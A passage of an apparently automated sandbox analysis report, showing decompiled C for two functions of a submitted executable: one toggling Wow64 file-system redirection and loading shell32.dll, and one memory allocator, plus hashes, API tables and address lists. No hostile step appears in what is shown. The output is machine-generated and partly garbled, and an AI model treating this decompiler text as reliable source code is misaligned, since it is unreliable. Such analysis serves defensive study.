                                                                                                                            • Opcode ID: ad1163668f60b09aa263e635df1463f1e4b37e8a5aa9c4cbf2e159c77cef0046
                                                                                                                            • Instruction ID: 88989adc3f1fa39a5a5eb6990527994e2deb527bcdcae90bffb7d35c0d41af56
                                                                                                                            • Opcode Fuzzy Hash: ad1163668f60b09aa263e635df1463f1e4b37e8a5aa9c4cbf2e159c77cef0046
                                                                                                                            • Instruction Fuzzy Hash: C01163716041096EEB00FBE68C42F9F77ACDF56714F50053AB604E72C5DA789905866D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004B5A90 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 56COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            C-Code - Quality: 60%
                                                                                                                            			E004B5A90(void* __ebx, void* __ecx, void* __edx, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _t16;
				intOrPtr _t32;
				intOrPtr _t41;

				_t27 = __ebx;
				_push(0);
				_push(0);
				_push(0);
				_push(_t41);
				_push(0x4b5b5a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t41;
				 *0x4c1124 =  *0x4c1124 - 1;
				if( *0x4c1124 < 0) {
					 *0x4c1128 = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"kernel32.dll"), L"Wow64DisableWow64FsRedirection");
					 *0x4c112c = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"kernel32.dll"), L"Wow64RevertWow64FsRedirection");
					if( *0x4c1128 == 0 ||  *0x4c112c == 0) {
						_t16 = 0;
					} else {
						_t16 = 1;
					}
					 *0x4c1130 = _t16;
					E00422D44( &_v12);
					E00422660(_v12,  &_v8);
					E004086E4( &_v8, L"shell32.dll");
					E00421230(_v8, _t27, 0x8000); // executed
					E004232EC(0x4c783afb,  &_v16);
				}
				_pop(_t32);
				 *[fs:eax] = _t32;
				_push(0x4b5b61);
				return E00407A80( &_v16, 3);
			}









                                                                                                                            0x004b5a90
                                                                                                                            0x004b5a93
                                                                                                                            0x004b5a95
                                                                                                                            0x004b5a97
                                                                                                                            0x004b5a9b
                                                                                                                            0x004b5a9c
                                                                                                                            0x004b5aa1
                                                                                                                            0x004b5aa4
                                                                                                                            0x004b5aa7
                                                                                                                            0x004b5aae
                                                                                                                            0x004b5ac9
                                                                                                                            0x004b5ae3
                                                                                                                            0x004b5aef
                                                                                                                            0x004b5afa
                                                                                                                            0x004b5afe
                                                                                                                            0x004b5afe
                                                                                                                            0x004b5afe
                                                                                                                            0x004b5b00
                                                                                                                            0x004b5b08
                                                                                                                            0x004b5b13
                                                                                                                            0x004b5b20
                                                                                                                            0x004b5b2d
                                                                                                                            0x004b5b3a
                                                                                                                            0x004b5b3a
                                                                                                                            0x004b5b41
                                                                                                                            0x004b5b44
                                                                                                                            0x004b5b47
                                                                                                                            0x004b5b59

                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004B5B5A,?,00000000,00000000,00000000), ref: 004B5ABE
                                                                                                                              • Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00423116), ref: 0040E1D2
                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004B5B5A,?,00000000,00000000,00000000), ref: 004B5AD8
                                                                                                                              • Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00000000), ref: 0040E20B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.401849374.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.401832965.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403182335.00000000004B7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403259407.00000000004C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403359279.00000000004C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403383029.00000000004C6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_62829252dc457_91e450cbce.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                            • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                                                                            • API String ID: 1646373207-2130885113
                                                                                                                            • Opcode ID: 149d4641e6716bccfc7038b8b83dc43c2c59674e16c2d4af6eff100d23c955b7
                                                                                                                            • Instruction ID: b56c6da1e02aeac4ac36a9fb763b3b3a2bfa4c382daca5c5ea2a5d16c2919690
                                                                                                                            • Opcode Fuzzy Hash: 149d4641e6716bccfc7038b8b83dc43c2c59674e16c2d4af6eff100d23c955b7
                                                                                                                            • Instruction Fuzzy Hash: DA11A730604704AFD744EB76DC02F9DB7B4E749704F64447BF500A6591CABC6A04CA3D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00403EE8 Relevance: 9.0, APIs: 7, Instructions: 298sleepCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 313 403ee8-403efa 314 403f00-403f10 313->314 315 404148-40414d 313->315 316 403f12-403f1f 314->316 317 403f68-403f71 314->317 318 404260-404263 315->318 319 404153-404164 315->319 324 403f21-403f2e 316->324 325 403f38-403f44 316->325 317->316 326 403f73-403f7f 317->326 322 403c94-403cbd VirtualAlloc 318->322 323 404269-40426b 318->323 320 404166-404182 319->320 321 40410c-404119 319->321 327 404190-40419f 320->327 328 404184-40418c 320->328 321->320 333 40411b-404124 321->333 329 403cef-403cf5 322->329 330 403cbf-403cec call 403c48 322->330 331 403f30-403f34 324->331 332 403f58-403f65 324->332 334 403f46-403f54 325->334 335 403fbc-403fc5 325->335 326->316 336 403f81-403f8d 326->336 340 4041a1-4041b5 327->340 341 4041b8-4041c0 327->341 338 4041ec-404202 328->338 330->329 333->321 344 404126-40413a Sleep 333->344 342 404000-40400a 335->342 343 403fc7-403fd4 335->343 336->316 337 403f8f-403f9b 336->337 337->317 345 403f9d-403fad Sleep 337->345 352 404204-404212 338->352 353 40421b-404227 338->353 340->338 347 4041c2-4041da 341->347 348 4041dc-4041de call 403bcc 341->348 350 40407c-404088 342->350 351 40400c-404037 342->351 343->342 349 403fd6-403fdf 343->349 344->320 354 40413c-404143 Sleep 344->354 345->316 357 403fb3-403fba Sleep 345->357 358 4041e3-4041eb 347->358 348->358 349->343 359 403fe1-403ff5 Sleep 349->359 355 4040b0-4040bf call 403bcc 350->355 356 40408a-40409c 350->356 361 404050-40405e 351->361 362 404039-404047 351->362 352->353 363 404214 352->363 364 404248 353->364 365 404229-40423c 353->365 354->321 375 4040d1-40410a 355->375 380 4040c1-4040cb 355->380 366 4040a0-4040ae 356->366 367 40409e 356->367 357->317 359->342 370 403ff7-403ffe Sleep 359->370 372 404060-40407a call 403b00 361->372 373 4040cc 361->373 362->361 371 404049 362->371 363->353 368 40424d-40425f 364->368 365->368 374 40423e-404243 call 403b00 365->374 366->375 367->366 370->343 371->361 372->375 373->375 374->368
                                                                                                                            C-Code - Quality: 68%
                                                                                                                            			E00403EE8(signed int __eax) {
				signed int __ebx;
				signed int __edi;
				signed int __esi;
				void* _t96;
				void** _t99;
				signed int _t104;
				signed int _t109;
				signed int _t110;
				intOrPtr* _t114;
				void* _t116;
				void* _t121;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t132;
				signed int _t133;
				signed int _t134;
				signed int _t135;
				unsigned int _t141;
				signed int _t142;
				void* _t144;
				void* _t147;
				intOrPtr _t148;
				signed int _t150;
				long _t156;
				intOrPtr _t159;
				signed int _t162;

				_t95 = __eax;
				_t129 =  *0x4bb059; // 0x0
				if(__eax > 0xa2c) {
					__eflags = __eax - 0x40a2c;
					if(__eax > 0x40a2c) {
						_pop(_t120);
						__eflags = __eax;
						if(__eax >= 0) {
							_push(_t120);
							_t162 = __eax;
							_t2 = _t162 + 0x10010; // 0x10110
							_t156 = _t2 - 0x00000001 + 0x00000004 & 0xffff0000;
							_t96 = VirtualAlloc(0, _t156, 0x101000, 4); // executed
							_t121 = _t96;
							if(_t121 != 0) {
								_t147 = _t121;
								 *((intOrPtr*)(_t147 + 8)) = _t162;
								 *(_t147 + 0xc) = _t156 | 0x00000004;
								E00403C48();
								_t99 =  *0x4bdb80; // 0x4bdb7c
								 *_t147 = 0x4bdb7c;
								 *0x4bdb80 = _t121;
								 *(_t147 + 4) = _t99;
								 *_t99 = _t121;
								 *0x4bdb78 = 0;
								_t121 = _t121 + 0x10;
							}
							return _t121;
						} else {
							__eflags = 0;
							return 0;
						}
					} else {
						_t67 = _t95 + 0xd3; // 0x1d3
						_t125 = (_t67 & 0xffffff00) + 0x30;
						__eflags = _t129;
						if(__eflags != 0) {
							while(1) {
								asm("lock cmpxchg [0x4bbae8], ah");
								if(__eflags == 0) {
									goto L42;
								}
								asm("pause");
								__eflags =  *0x4bb989;
								if(__eflags != 0) {
									continue;
								} else {
									Sleep(0);
									asm("lock cmpxchg [0x4bbae8], ah");
									if(__eflags != 0) {
										Sleep(0xa);
										continue;
									}
								}
								goto L42;
							}
						}
						L42:
						_t68 = _t125 - 0xb30; // -2445
						_t141 = _t68;
						_t142 = _t141 >> 0xd;
						_t131 = _t141 >> 8;
						_t104 = 0xffffffff << _t131 &  *(0x4bbaf8 + _t142 * 4);
						__eflags = 0xffffffff;
						if(0xffffffff == 0) {
							_t132 = _t142;
							__eflags = 0xfffffffe << _t132 &  *0x4bbaf4;
							if((0xfffffffe << _t132 &  *0x4bbaf4) == 0) {
								_t133 =  *0x4bbaf0; // 0x0
								_t134 = _t133 - _t125;
								__eflags = _t134;
								if(_t134 < 0) {
									_t109 = E00403BCC(_t125);
								} else {
									_t110 =  *0x4bbaec; // 0x2573460
									_t109 = _t110 - _t125;
									 *0x4bbaec = _t109;
									 *0x4bbaf0 = _t134;
									 *(_t109 - 4) = _t125 | 0x00000002;
								}
								 *0x4bbae8 = 0;
								return _t109;
							} else {
								asm("bsf edx, eax");
								asm("bsf ecx, eax");
								_t135 = _t132 | _t142 << 0x00000005;
								goto L50;
							}
						} else {
							asm("bsf eax, eax");
							_t135 = _t131 & 0xffffffe0 | _t104;
							L50:
							_push(_t152);
							_push(_t145);
							_t148 = 0x4bbb78 + _t135 * 8;
							_t159 =  *((intOrPtr*)(_t148 + 4));
							_t114 =  *((intOrPtr*)(_t159 + 4));
							 *((intOrPtr*)(_t148 + 4)) = _t114;
							 *_t114 = _t148;
							__eflags = _t148 - _t114;
							if(_t148 == _t114) {
								asm("rol eax, cl");
								_t80 = 0x4bbaf8 + _t142 * 4;
								 *_t80 =  *(0x4bbaf8 + _t142 * 4) & 0xfffffffe;
								__eflags =  *_t80;
								if( *_t80 == 0) {
									asm("btr [0x4bbaf4], edx");
								}
							}
							_t150 = 0xfffffff0 &  *(_t159 - 4);
							_t144 = 0xfffffff0 - _t125;
							__eflags = 0xfffffff0;
							if(0xfffffff0 == 0) {
								_t89 =  &((_t159 - 4)[0xfffffffffffffffc]);
								 *_t89 =  *(_t159 - 4 + _t150) & 0x000000f7;
								__eflags =  *_t89;
							} else {
								_t116 = _t125 + _t159;
								 *((intOrPtr*)(_t116 - 4)) = 0xfffffffffffffff3;
								 *(0xfffffff0 + _t116 - 8) = 0xfffffff0;
								__eflags = 0xfffffff0 - 0xb30;
								if(0xfffffff0 >= 0xb30) {
									E00403B00(_t116, 0xfffffffffffffff3, _t144);
								}
							}
							_t93 = _t125 + 2; // 0x1a5
							 *(_t159 - 4) = _t93;
							 *0x4bbae8 = 0;
							return _t159;
						}
					}
				} else {
					__eflags = __cl;
					_t6 = __edx + 0x4bb990; // 0xc8c8c8c8
					__eax =  *_t6 & 0x000000ff;
					__ebx = 0x4b7080 + ( *_t6 & 0x000000ff) * 8;
					if(__eflags != 0) {
						while(1) {
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__eflags == 0) {
								goto L5;
							}
							__ebx = __ebx + 0x20;
							__eflags = __ebx;
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__ebx != 0) {
								__ebx = __ebx + 0x20;
								__eflags = __ebx;
								__eax = 0x100;
								asm("lock cmpxchg [ebx], ah");
								if(__ebx != 0) {
									__ebx = __ebx - 0x40;
									asm("pause");
									__eflags =  *0x4bb989;
									if(__eflags != 0) {
										continue;
									} else {
										Sleep(0);
										__eax = 0x100;
										asm("lock cmpxchg [ebx], ah");
										if(__eflags != 0) {
											Sleep(0xa);
											continue;
										}
									}
								}
							}
							goto L5;
						}
					}
					L5:
					__edx =  *(__ebx + 8);
					__eax =  *(__edx + 0x10);
					__ecx = 0xfffffff8;
					__eflags = __edx - __ebx;
					if(__edx == __ebx) {
						__edx =  *(__ebx + 0x18);
						__ecx =  *(__ebx + 2) & 0x0000ffff;
						__ecx = ( *(__ebx + 2) & 0x0000ffff) + __eax;
						__eflags = __eax -  *(__ebx + 0x14);
						if(__eax >  *(__ebx + 0x14)) {
							_push(__esi);
							_push(__edi);
							__eflags =  *0x4bb059;
							if(__eflags != 0) {
								while(1) {
									__eax = 0x100;
									asm("lock cmpxchg [0x4bbae8], ah");
									if(__eflags == 0) {
										goto L22;
									}
									asm("pause");
									__eflags =  *0x4bb989;
									if(__eflags != 0) {
										continue;
									} else {
										Sleep(0);
										__eax = 0x100;
										asm("lock cmpxchg [0x4bbae8], ah");
										if(__eflags != 0) {
											Sleep(0xa);
											continue;
										}
									}
									goto L22;
								}
							}
							L22:
							 *(__ebx + 1) =  *(__ebx + 1) &  *0x4bbaf4;
							__eflags =  *(__ebx + 1) &  *0x4bbaf4;
							if(( *(__ebx + 1) &  *0x4bbaf4) == 0) {
								__ecx =  *(__ebx + 4) & 0x0000ffff;
								__edi =  *0x4bbaf0; // 0x0
								__eflags = __edi - ( *(__ebx + 4) & 0x0000ffff);
								if(__edi < ( *(__ebx + 4) & 0x0000ffff)) {
									__eax =  *(__ebx + 6) & 0x0000ffff;
									__edi = __eax;
									__eax = E00403BCC(__eax);
									__esi = __eax;
									__eflags = __eax;
									if(__eax != 0) {
										goto L35;
									} else {
										 *0x4bbae8 = __al;
										 *__ebx = __al;
										_pop(__edi);
										_pop(__esi);
										_pop(__ebx);
										return __eax;
									}
								} else {
									__esi =  *0x4bbaec; // 0x2573460
									__ecx =  *(__ebx + 6) & 0x0000ffff;
									__edx = __ecx + 0xb30;
									__eflags = __edi - __ecx + 0xb30;
									if(__edi >= __ecx + 0xb30) {
										__edi = __ecx;
									}
									__esi = __esi - __edi;
									 *0x4bbaf0 =  *0x4bbaf0 - __edi;
									 *0x4bbaec = __esi;
									goto L35;
								}
							} else {
								asm("bsf eax, esi");
								__esi = __eax * 8;
								__ecx =  *(0x4bbaf8 + __eax * 4);
								asm("bsf ecx, ecx");
								__ecx =  *(0x4bbaf8 + __eax * 4) + __eax * 8 * 4;
								__edi = 0x4bbb78 + ( *(0x4bbaf8 + __eax * 4) + __eax * 8 * 4) * 8;
								__esi =  *(__edi + 4);
								__edx =  *(__esi + 4);
								 *(__edi + 4) = __edx;
								 *__edx = __edi;
								__eflags = __edi - __edx;
								if(__edi == __edx) {
									__edx = 0xfffffffe;
									asm("rol edx, cl");
									_t38 = 0x4bbaf8 + __eax * 4;
									 *_t38 =  *(0x4bbaf8 + __eax * 4) & 0xfffffffe;
									__eflags =  *_t38;
									if( *_t38 == 0) {
										asm("btr [0x4bbaf4], eax");
									}
								}
								__edi = 0xfffffff0;
								__edi = 0xfffffff0 &  *(__esi - 4);
								__eflags = 0xfffffff0 - 0x10a60;
								if(0xfffffff0 < 0x10a60) {
									_t52 =  &((__esi - 4)[0xfffffffffffffffc]);
									 *_t52 = (__esi - 4)[0xfffffffffffffffc] & 0x000000f7;
									__eflags =  *_t52;
								} else {
									__edx = __edi;
									__edi =  *(__ebx + 6) & 0x0000ffff;
									__edx = __edx - __edi;
									__eax = __edi + __esi;
									__ecx = __edx + 3;
									 *(__eax - 4) = __ecx;
									 *(__edx + __eax - 8) = __edx;
									__eax = E00403B00(__eax, __ecx, __edx);
								}
								L35:
								_t56 = __edi + 6; // 0x6
								__ecx = _t56;
								 *(__esi - 4) = _t56;
								__eax = 0;
								 *0x4bbae8 = __al;
								 *__esi = __ebx;
								 *((intOrPtr*)(__esi + 0x10)) = 0;
								 *((intOrPtr*)(__esi + 0x14)) = 1;
								 *(__ebx + 0x18) = __esi;
								_t61 = __esi + 0x20; // 0x2573480
								__eax = _t61;
								__ecx =  *(__ebx + 2) & 0x0000ffff;
								__edx = __ecx + __eax;
								 *(__ebx + 0x10) = __ecx + __eax;
								__edi = __edi + __esi;
								__edi = __edi - __ecx;
								__eflags = __edi;
								 *(__ebx + 0x14) = __edi;
								 *__ebx = 0;
								 *(__eax - 4) = __esi;
								_pop(__edi);
								_pop(__esi);
								_pop(__ebx);
								return __eax;
							}
						} else {
							_t19 = __edx + 0x14;
							 *_t19 =  *(__edx + 0x14) + 1;
							__eflags =  *_t19;
							 *(__ebx + 0x10) = __ecx;
							 *__ebx = 0;
							 *(__eax - 4) = __edx;
							_pop(__ebx);
							return __eax;
						}
					} else {
						 *(__edx + 0x14) =  *(__edx + 0x14) + 1;
						__ecx = 0xfffffff8 &  *(__eax - 4);
						__eflags = 0xfffffff8;
						 *(__edx + 0x10) = 0xfffffff8 &  *(__eax - 4);
						 *(__eax - 4) = __edx;
						if(0xfffffff8 == 0) {
							__ecx =  *(__edx + 8);
							 *(__ecx + 0xc) = __ebx;
							 *(__ebx + 8) = __ecx;
							 *__ebx = 0;
							_pop(__ebx);
							return __eax;
						} else {
							 *__ebx = 0;
							_pop(__ebx);
							return __eax;
						}
					}
				}
			}






























                                                                                                                            0x00403ee8
                                                                                                                            0x00403ef4
                                                                                                                            0x00403efa
                                                                                                                            0x00404148
                                                                                                                            0x0040414d
                                                                                                                            0x00404260
                                                                                                                            0x00404261
                                                                                                                            0x00404263
                                                                                                                            0x00403c94
                                                                                                                            0x00403c98
                                                                                                                            0x00403c9a
                                                                                                                            0x00403ca4
                                                                                                                            0x00403cb4
                                                                                                                            0x00403cb9
                                                                                                                            0x00403cbd
                                                                                                                            0x00403cbf
                                                                                                                            0x00403cc1
                                                                                                                            0x00403cc7
                                                                                                                            0x00403cca
                                                                                                                            0x00403ccf
                                                                                                                            0x00403cd4
                                                                                                                            0x00403cda
                                                                                                                            0x00403ce0
                                                                                                                            0x00403ce3
                                                                                                                            0x00403ce5
                                                                                                                            0x00403cec
                                                                                                                            0x00403cec
                                                                                                                            0x00403cf5
                                                                                                                            0x00404269
                                                                                                                            0x00404269
                                                                                                                            0x0040426b
                                                                                                                            0x0040426b
                                                                                                                            0x00404153
                                                                                                                            0x00404153
                                                                                                                            0x0040415f
                                                                                                                            0x00404162
                                                                                                                            0x00404164
                                                                                                                            0x0040410c
                                                                                                                            0x00404111
                                                                                                                            0x00404119
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040411b
                                                                                                                            0x0040411d
                                                                                                                            0x00404124
                                                                                                                            0x00000000
                                                                                                                            0x00404126
                                                                                                                            0x00404128
                                                                                                                            0x00404132
                                                                                                                            0x0040413a
                                                                                                                            0x0040413e
                                                                                                                            0x00000000
                                                                                                                            0x0040413e
                                                                                                                            0x0040413a
                                                                                                                            0x00000000
                                                                                                                            0x00404124
                                                                                                                            0x0040410c
                                                                                                                            0x00404166
                                                                                                                            0x00404166
                                                                                                                            0x00404166
                                                                                                                            0x0040416e
                                                                                                                            0x00404171
                                                                                                                            0x0040417b
                                                                                                                            0x0040417b
                                                                                                                            0x00404182
                                                                                                                            0x00404195
                                                                                                                            0x00404199
                                                                                                                            0x0040419f
                                                                                                                            0x004041b8
                                                                                                                            0x004041be
                                                                                                                            0x004041be
                                                                                                                            0x004041c0
                                                                                                                            0x004041de
                                                                                                                            0x004041c2
                                                                                                                            0x004041c2
                                                                                                                            0x004041c7
                                                                                                                            0x004041c9
                                                                                                                            0x004041ce
                                                                                                                            0x004041d7
                                                                                                                            0x004041d7
                                                                                                                            0x004041e3
                                                                                                                            0x004041eb
                                                                                                                            0x004041a1
                                                                                                                            0x004041a1
                                                                                                                            0x004041ab
                                                                                                                            0x004041b3
                                                                                                                            0x00000000
                                                                                                                            0x004041b3
                                                                                                                            0x00404184
                                                                                                                            0x00404187
                                                                                                                            0x0040418a
                                                                                                                            0x004041ec
                                                                                                                            0x004041ec
                                                                                                                            0x004041ed
                                                                                                                            0x004041ee
                                                                                                                            0x004041f5
                                                                                                                            0x004041f8
                                                                                                                            0x004041fb
                                                                                                                            0x004041fe
                                                                                                                            0x00404200
                                                                                                                            0x00404202
                                                                                                                            0x00404209
                                                                                                                            0x0040420b
                                                                                                                            0x0040420b
                                                                                                                            0x0040420b
                                                                                                                            0x00404212
                                                                                                                            0x00404214
                                                                                                                            0x00404214
                                                                                                                            0x00404212
                                                                                                                            0x00404220
                                                                                                                            0x00404225
                                                                                                                            0x00404225
                                                                                                                            0x00404227
                                                                                                                            0x00404248
                                                                                                                            0x00404248
                                                                                                                            0x00404248
                                                                                                                            0x00404229
                                                                                                                            0x00404229
                                                                                                                            0x0040422f
                                                                                                                            0x00404232
                                                                                                                            0x00404236
                                                                                                                            0x0040423c
                                                                                                                            0x0040423e
                                                                                                                            0x0040423e
                                                                                                                            0x0040423c
                                                                                                                            0x0040424d
                                                                                                                            0x00404250
                                                                                                                            0x00404253
                                                                                                                            0x0040425f
                                                                                                                            0x0040425f
                                                                                                                            0x00404182
                                                                                                                            0x00403f00
                                                                                                                            0x00403f00
                                                                                                                            0x00403f02
                                                                                                                            0x00403f02
                                                                                                                            0x00403f09
                                                                                                                            0x00403f10
                                                                                                                            0x00403f68
                                                                                                                            0x00403f68
                                                                                                                            0x00403f6d
                                                                                                                            0x00403f71
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00403f73
                                                                                                                            0x00403f73
                                                                                                                            0x00403f76
                                                                                                                            0x00403f7b
                                                                                                                            0x00403f7f
                                                                                                                            0x00403f81
                                                                                                                            0x00403f81
                                                                                                                            0x00403f84
                                                                                                                            0x00403f89
                                                                                                                            0x00403f8d
                                                                                                                            0x00403f8f
                                                                                                                            0x00403f92
                                                                                                                            0x00403f94
                                                                                                                            0x00403f9b
                                                                                                                            0x00000000
                                                                                                                            0x00403f9d
                                                                                                                            0x00403f9f
                                                                                                                            0x00403fa4
                                                                                                                            0x00403fa9
                                                                                                                            0x00403fad
                                                                                                                            0x00403fb5
                                                                                                                            0x00000000
                                                                                                                            0x00403fb5
                                                                                                                            0x00403fad
                                                                                                                            0x00403f9b
                                                                                                                            0x00403f8d
                                                                                                                            0x00000000
                                                                                                                            0x00403f7f
                                                                                                                            0x00403f68
                                                                                                                            0x00403f12
                                                                                                                            0x00403f12
                                                                                                                            0x00403f15
                                                                                                                            0x00403f18
                                                                                                                            0x00403f1d
                                                                                                                            0x00403f1f
                                                                                                                            0x00403f38
                                                                                                                            0x00403f3b
                                                                                                                            0x00403f3f
                                                                                                                            0x00403f41
                                                                                                                            0x00403f44
                                                                                                                            0x00403fbc
                                                                                                                            0x00403fbd
                                                                                                                            0x00403fbe
                                                                                                                            0x00403fc5
                                                                                                                            0x00403fc7
                                                                                                                            0x00403fc7
                                                                                                                            0x00403fcc
                                                                                                                            0x00403fd4
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00403fd6
                                                                                                                            0x00403fd8
                                                                                                                            0x00403fdf
                                                                                                                            0x00000000
                                                                                                                            0x00403fe1
                                                                                                                            0x00403fe3
                                                                                                                            0x00403fe8
                                                                                                                            0x00403fed
                                                                                                                            0x00403ff5
                                                                                                                            0x00403ff9
                                                                                                                            0x00000000
                                                                                                                            0x00403ff9
                                                                                                                            0x00403ff5
                                                                                                                            0x00000000
                                                                                                                            0x00403fdf
                                                                                                                            0x00403fc7
                                                                                                                            0x00404000
                                                                                                                            0x00404004
                                                                                                                            0x00404004
                                                                                                                            0x0040400a
                                                                                                                            0x0040407c
                                                                                                                            0x00404080
                                                                                                                            0x00404086
                                                                                                                            0x00404088
                                                                                                                            0x004040b0
                                                                                                                            0x004040b4
                                                                                                                            0x004040b6
                                                                                                                            0x004040bb
                                                                                                                            0x004040bd
                                                                                                                            0x004040bf
                                                                                                                            0x00000000
                                                                                                                            0x004040c1
                                                                                                                            0x004040c1
                                                                                                                            0x004040c6
                                                                                                                            0x004040c8
                                                                                                                            0x004040c9
                                                                                                                            0x004040ca
                                                                                                                            0x004040cb
                                                                                                                            0x004040cb
                                                                                                                            0x0040408a
                                                                                                                            0x0040408a
                                                                                                                            0x00404090
                                                                                                                            0x00404094
                                                                                                                            0x0040409a
                                                                                                                            0x0040409c
                                                                                                                            0x0040409e
                                                                                                                            0x0040409e
                                                                                                                            0x004040a0
                                                                                                                            0x004040a2
                                                                                                                            0x004040a8
                                                                                                                            0x00000000
                                                                                                                            0x004040a8
                                                                                                                            0x0040400c
                                                                                                                            0x0040400c
                                                                                                                            0x0040400f
                                                                                                                            0x00404016
                                                                                                                            0x0040401d
                                                                                                                            0x00404020
                                                                                                                            0x00404023
                                                                                                                            0x0040402a
                                                                                                                            0x0040402d
                                                                                                                            0x00404030
                                                                                                                            0x00404033
                                                                                                                            0x00404035
                                                                                                                            0x00404037
                                                                                                                            0x00404039
                                                                                                                            0x0040403e
                                                                                                                            0x00404040
                                                                                                                            0x00404040
                                                                                                                            0x00404040
                                                                                                                            0x00404047
                                                                                                                            0x00404049
                                                                                                                            0x00404049
                                                                                                                            0x00404047
                                                                                                                            0x00404050
                                                                                                                            0x00404055
                                                                                                                            0x00404058
                                                                                                                            0x0040405e
                                                                                                                            0x004040cc
                                                                                                                            0x004040cc
                                                                                                                            0x004040cc
                                                                                                                            0x00404060
                                                                                                                            0x00404060
                                                                                                                            0x00404062
                                                                                                                            0x00404066
                                                                                                                            0x00404068
                                                                                                                            0x0040406b
                                                                                                                            0x0040406e
                                                                                                                            0x00404071
                                                                                                                            0x00404075
                                                                                                                            0x00404075
                                                                                                                            0x004040d1
                                                                                                                            0x004040d1
                                                                                                                            0x004040d1
                                                                                                                            0x004040d4
                                                                                                                            0x004040d7
                                                                                                                            0x004040d9
                                                                                                                            0x004040de
                                                                                                                            0x004040e0
                                                                                                                            0x004040e3
                                                                                                                            0x004040ea
                                                                                                                            0x004040ed
                                                                                                                            0x004040ed
                                                                                                                            0x004040f0
                                                                                                                            0x004040f4
                                                                                                                            0x004040f7
                                                                                                                            0x004040fa
                                                                                                                            0x004040fc
                                                                                                                            0x004040fc
                                                                                                                            0x004040fe
                                                                                                                            0x00404101
                                                                                                                            0x00404104
                                                                                                                            0x00404107
                                                                                                                            0x00404108
                                                                                                                            0x00404109
                                                                                                                            0x0040410a
                                                                                                                            0x0040410a
                                                                                                                            0x00403f46
                                                                                                                            0x00403f46
                                                                                                                            0x00403f46
                                                                                                                            0x00403f46
                                                                                                                            0x00403f4a
                                                                                                                            0x00403f4d
                                                                                                                            0x00403f50
                                                                                                                            0x00403f53
                                                                                                                            0x00403f54
                                                                                                                            0x00403f54
                                                                                                                            0x00403f21
                                                                                                                            0x00403f21
                                                                                                                            0x00403f25
                                                                                                                            0x00403f25
                                                                                                                            0x00403f28
                                                                                                                            0x00403f2b
                                                                                                                            0x00403f2e
                                                                                                                            0x00403f58
                                                                                                                            0x00403f5b
                                                                                                                            0x00403f5e
                                                                                                                            0x00403f61
                                                                                                                            0x00403f64
                                                                                                                            0x00403f65
                                                                                                                            0x00403f30
                                                                                                                            0x00403f30
                                                                                                                            0x00403f33
                                                                                                                            0x00403f34
                                                                                                                            0x00403f34
                                                                                                                            0x00403f2e
                                                                                                                            0x00403f1f

                                                                                                                            APIs
                                                                                                                            • Sleep.KERNEL32(00000000,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000,0040C3ED), ref: 00403F9F
                                                                                                                            • Sleep.KERNEL32(0000000A,00000000,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000,0040C3ED), ref: 00403FB5
                                                                                                                            • Sleep.KERNEL32(00000000,00000000,?,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000,0040C3ED), ref: 00403FE3
                                                                                                                            • Sleep.KERNEL32(0000000A,00000000,00000000,?,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000,0040C3ED), ref: 00403FF9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.401849374.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.401832965.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403182335.00000000004B7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403259407.00000000004C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403359279.00000000004C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403383029.00000000004C6000.00000002.00000001.01000000.0000000A.sdmpDownload File
